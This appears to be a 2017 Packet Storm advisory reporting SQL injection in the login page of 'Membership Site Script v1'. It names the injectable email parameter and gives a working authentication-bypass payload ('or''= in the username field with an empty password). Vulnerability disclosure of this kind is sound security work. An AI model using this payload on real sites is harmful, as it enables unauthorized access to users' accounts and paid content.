Membership Site Script 1 SQL Injection

2017-03-23T00:00:00
ID PACKETSTORM:141790
Type packetstorm
Reporter Bilal Kardadou
Modified 2017-03-23T00:00:00

Description

                                        
                                            `################################################  
#Title: Membership Site Script v1 - SQL injection  
#Credit: Bilal KARDADOU  
#Vendor: http://www.turnkeycentral.com  
#Vendor URL: http://www.turnkeycentral.com/scripts/membership-site-script/  
#Product: Membership Site Script v1  
#Google Dork: N/A  
################################################  
#  
# Product & Service Introduction:  
#  
# "Membership Site Script"  
# Do you want to Launch Your Own Membership Site That Grows Automatically  
on AutoPilot? With a membership site,  
# your customers sign up and pay a monthly fee to gain access to special,  
private, members-only content.  
# The content might be eBooks, scripts, articles, graphics, coaching audio  
or video a whatever you want.  
#  
# http://localhost/membershipscript/login.php  
# submit=1&email=demo@gmail.com[SQL]&password=123456  
#  
#  
# Authentication Bypass :  
# http://localhost/membershipscript/login.php  
# Username: test@test.com 'or''='  
# Password: [empty]  
#  
# PoC:  
# http://prnt.sc/en4u2s  
# http://prnt.sc/en4tze  
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)  
################################################  
--   
*Bilal Kardadou*  
IT Security Consultant  
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |  
`